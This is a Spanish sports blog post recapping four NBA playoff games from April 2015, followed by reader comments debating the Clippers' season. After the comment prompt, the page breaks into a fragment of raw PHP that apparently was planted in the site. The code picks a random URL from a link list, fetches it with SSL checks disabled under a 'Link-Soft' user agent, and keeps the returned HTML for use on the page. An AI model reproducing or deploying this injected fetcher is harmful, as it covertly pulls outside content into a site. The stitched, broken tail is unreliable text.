La Crónica: 4/4 para los locales

20 de April de 2015 por MagicJohnson32

Ya han arrancado todas las series de primera ronda de los Playoffs 2015. El domingo deparó cuatro victorias locales, incluyendo la de los Clippers sobre unos Spurs que no se parecieron en nada a los campeones. Repasamos la jornada.

San Antonio Spurs 92 – L.A. Clippers 107

“Su defensa fue mejor que nuestro ataque”. Gregg Popovich resumió de esta manera la primera derrota de los Spurs en un partido inaugural de una serie de Playoffs desde cuatro años. Posiblemente también debió añadir que el ataque de los Clippers fue mejor que la defensa de los campeones, siempre a remolque frente a un equipo que mostró más hambre y pareció más consciente de la trascendencia del duelo. Como sabiendo que tenían mucho que demostrar, los angelinos saltaron al parquet dispuestos a ello: anotaron 30 puntos en el primer cuarto y mandaron casi siempre. Chris Paul, auténtico amo y señor del juego, barrió a Parker mientras Jordan ejercía su poderío físico en la pintura y Blake Griffin aportaba en todos los aspectos. El PF reservó lo mejor para el tercer cuarto, cuando firmó tres mates de póster sobre Baynes que propulsaron definitivamente a los Clippers hacia la victoria. Tres triples casi seguidos de Mills, Green y Belinelli propiciaron un amago de reacción de los Spurs pero un 7-0 de los locales selló de inmediato un triunfo que infla la moral de los Clippers y pondrá a prueba al corazón del campeón.

Portland Trail Blazers 86 – Memphis Grizzlies 100

Ya hemos visto esta película. En ella, la defensa de los Grizzlies asfixia a los Blazers, carentes de la pólvora necesaria para derribar el muro de Joerger. Por quinta vez esta temporada, Memphis se impuso con claridad a un rival que además se presentó en esta serie sin su mejor lanzador exterior, Matthews, y sin su sustituto Afflalo, quien podría regresar para el Game 2. Y, por si fuera poco, los Grizzlies contaron con un Beno Udrih tocado por una varita, magnífico toda la velada y que expuso los problemas de los Blazers para defender a los bases rivales. Aunque lo que hundió a los Blazers fue la ineficacia de su pareja estelar, Aldridge & Lillard, que sufrieron horrores para sumar en ataque (46 puntos en 55 tiros). Así, no necesitaron grandes alardes ofensivos los Grizzlies, que se bastaron con un gran Marc al mando de las operaciones a ambos lados de la cancha para adelantase en la serie.

Boston Celtics 100 – Cleveland Cavaliers 113

David Blatt, Kyrie Irving y Kevin Love debutaron en los Playoffs con victoria, como no podía ser de otra manera dada la superioridad de los Cavs ante un rival que, por mucho mérito que merezcan, no está en condiciones de presentar una batalla real. Pese a todo, los Celtics dieron la cara durante bastantes minutos, llegaron a ponerse +8 en el segundo cuarto y se mantuvieron a tiro de piedra de su rival hasta que Kevin Love se entonó en el tercer cuarto y completó el Big Three después de que Irving y James sostuviesen a los suyos en la primera mitad. A partir de ahí, los Cavs se dedicaron a neutralizar cada intento de remontada visitante, casi siempre por parte de un Isaiah Thomas que fue la principal amenaza ofensiva visitante pese a acusar cierta tendencia al abuso de bola y la precipitación.

Brooklyn Nets 92 – Atlanta Hawks 99

22 victorias separaron a los Nets de los Hawks al final de la regular season, así que cualquier cosa que no sea una victoria cómoda de Atlanta debería suponer una sorpresa. Sin embargo, el primer partido de la serie probó que las victorias cómodas no abundan en Playoffs. Los Hawks mandaron de principio a fin y de entrada parecían dispuestos a sentenciar pronto cuando se situaron 16 arriba en el segundo cuarto. Pero los Nets se agarraron al partido y obligaron a los locales a extender su esfuerzo 48 minutos que a los de Bundelholzer se les hicieron largos. Millsap demostró que no está completamente recuperado de la lesión de hombro y Horford se dislocó un dedo, con lo que la responsabilidad ofensiva recayó sobre Teague y Korver, autor de 5 triples y máximo anotador del encuentro. Pese a la derrota y que los precedentes no acompañan (los Nets perdieron todos sus duelos de la regular season ante los Hawks por una diferencia de más de 17 puntos), los Nets parecieron en condiciones de alargar la serie más allá de los cuatro partidos.

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Es un buen momento para plantear una cuestión muy discutida por aquí…
    Podemos calificar la temporada de las clip personas como buena independientemente de lo q pase en adelante?

      Citar

  2. TheDeerHunter dice:
    #2

    De los clippers. .. puñetero corrector

      Citar

  3. Viva_Dirk dice:
    #3

    Yo diría que la temporada de los Clippers es de notable, 56 victorias en una conferencia infernal, con gran implicación de los jugadores menos importantes como Barnes o Redick y una evidente evolución tanto de Griffin como de Jordan.

    La versión que dieron ayer a mi me dejó sorprendido, dominaron a San Antonio todo el partido, seriedad absoluta, un juego muy trabajado en ambos lados de la pista y dos estrellas posiblemente en el mejor momento de sus carreras. Hay que ver que pasa en esta serie, que son los Spurs, pero visto lo de ayer, y visto el primer partido del Mavs-Rockets para mi Clippers sería muy favorito ante cualquiera de los 2.

      Citar

  4. Ruxixón dice:
    #4

    Ojo a la tremenda influencia que Jordan ejerció en el ataque de los Spurs en el partido de ayer,sobre todo en la primera parte.Hacía tiempo que no veía a San Antonio tan condicionado por la presencia de un jugador.Luego en la segunda parte al son de CP3 y Griffin ejecutando y no hubo partido.

    Por su parte muy meritoria la versión de los Celtics en el día de ayer.Hizo bastante daño el spacing en su ataque,y la defensa de los Cavaliers leyó muy mal esas situaciones dando esa ventaja a Boston.Luego Love se afinó en defensa y en ataque y el partido rompió para el lado lógico,pero me gustaron bastante los verdes.Irving tremendo,se la va a sacar en estos primeros PO de su carrera.

      Citar

  5. GreenPride dice:
    #5

    Pues completado el primer partido de todas las eliminatorias quizás la mayor sorpresa es ver cómo los Clippers han dominado a los Spurs (no la victoria sino el cómo). Con una velocidad más que los texanos, CP3 dominando totalmente a un Parker desconocido (lesionado??), Griffin imponiéndose a sus pares y DeAndre causando el terror dentro de la pintura y taponando o alterando muchos lanzamientos, los Clips jugaron uno de los mejores partidos que les recuerde. Los Spurs necesitarán más decisión a la hora de entrar a la zona rival por mucho Jordan que ande por allí y quizás bajar un poco el frenético ritmo de juego para poder meterles mano a estos Clippers. Gran detalle táctico de Doc doblando marcaje con DeAndre cada vez que Kawhi recibía al poste aprovechando la velocidad de Jordan para recuperar marcaje con jugadores menos peligrosos (Baynes, Splitter,…). Queda mucha serie pero la iniciativa es de los angelinos aunque no seré yo el que entierre a los campeones.
    Del resto, meritorios Celtics ante unos Cavs que usarán esta eliminatoria de engranaje para la siguiente (Bulls??), no convencen los Hawks con sus dos interiores mermados y fenomenal partido de Memphis que doblegó clarísimamente a los Blazers. Si Beno Udrih supera a Lillard pues no hay más que hablar.

      Citar

  6. GreenPride dice:
    #6

    Sobre si la temporada de los Clippers merece ya buena nota, pues depende de lo que hagan en PO según mi opinión. La regular se puede calificar de notable pero todo dependerá de lo que hagan en PO para su nota final. Si pierden con Spurs pero con buena imagen yo creo que seguirá siendo notable, si pasan ya será seguro notable alto y buscando el sobresaliente en el resto de PO y si pierden con estrépito con Spurs pues no pasaría de bien. Esto es así, hay que rendir en el momento clave, salvo que tengas lesionados de importancia que no es el caso.

      Citar

  7. Jose A.Ramirez dice:
    #7

    Yo ya no creo en las varas de medir una temporada de un equipo del west porque me he parado a pensar ese tema muchas veces y es imposible dado que casi cualquier eliminatoria en esa conferencia siempre va a haber un equipo que por matematicas tenga que ser eliminado y suelen ser equipazos todos ellos. Igualmente, puede pasar por ejemplo que spurs caigan 4-3 en esta eliminatoria pero dando buena imagen asta el final y perdiendo por detalles o sin embargo que pasen esta ronda y caigan 4-1 con cualquier otro equipo, entonces que es mejor a nuestros ojos? pff… En cuanto a clippers este debe ser su año, minimo final de conferencia porque llevan ya años estancaos… y volvemos a lo mismo, aun sabiendo lo expuesto te queda la sensacion de decepcion si caen antes…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>